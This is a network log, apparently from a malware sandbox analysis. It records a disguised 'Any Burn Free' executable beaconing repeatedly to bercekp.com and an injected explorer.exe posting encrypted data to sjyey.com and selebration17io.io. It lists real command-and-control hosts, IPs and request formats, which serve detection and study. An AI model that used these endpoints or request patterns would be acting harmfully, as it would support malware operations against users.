                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:28 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    165192.168.2.349942185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:29.001666069 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:29.238101959 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:29 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    166192.168.2.349943185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:29.618067980 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:29.854965925 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:29 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    167192.168.2.349944185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:30.231962919 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:30.471518993 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:30 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    168192.168.2.349945185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:30.942940950 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:31.181938887 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:31 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    169192.168.2.349946185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:31.552037001 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:31.789082050 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:31 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    170192.168.2.349947109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:31.972850084 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://gbwukmwvgrgsfaaf.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 211
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:11:31.972886086 CET211OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 45 37 f0 f4
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA .[k,vuE7t*Z@XT%XpLz6qPs*.X-_ByYV"MG).7]*1A`1Q_Z<_r
                                                                                                                                                                    Feb 8, 2024 19:11:32.402832985 CET252INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:32 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 7
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                                                    Data Ascii: r


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    171192.168.2.349948185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:32.158106089 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:32.394687891 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:32 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    172192.168.2.34995091.215.85.12080640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:32.639228106 CET288OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://rtidvriqxmxrtbpy.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 267
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:11:32.639228106 CET267OUTData Raw: 48 9d 8b cb 3a 64 54 50 59 06 21 52 08 a1 5f bb 2f 69 ed 1b 8e 1f d7 aa b3 1c d2 84 70 ff d7 e4 89 af 81 be 74 36 95 c7 a2 5a 6a 7c 8d 96 fd 1b f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 9a f9 16 d9
                                                                                                                                                                    Data Ascii: H:dTPY!R_/ipt6Zj|_=;}f=B!bO,U8"Cfzot_ca8L>~0?"\'Pen9_J|u;?mi4'1'_1OQ3MtFV[TRC4r
                                                                                                                                                                    Feb 8, 2024 19:11:32.893661976 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:32 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 7=[0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    173192.168.2.349951185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:32.814192057 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:33.050914049 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:32 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    174192.168.2.349952185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:33.400840044 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:33.640975952 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:33 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    175192.168.2.349953185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:34.022762060 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:34.259547949 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:34 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    176192.168.2.349954185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:34.623933077 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:34.860586882 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:34 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    177192.168.2.349955185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:35.290396929 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:35.531342983 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:35 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    178192.168.2.349956185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:35.910337925 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:36.147835970 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:36 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    179192.168.2.349957185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:36.497860909 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:36.735486031 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:36 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    180192.168.2.349958185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:37.136805058 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:37.373593092 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:37 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    181192.168.2.349959185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:37.783612013 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:38.020800114 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:37 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    182192.168.2.349960185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:38.629383087 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:38.865991116 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:38 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    183192.168.2.349961185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:39.357923985 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:39.594865084 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:39 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    184192.168.2.349962185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:39.947467089 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:40.184432983 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:40 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
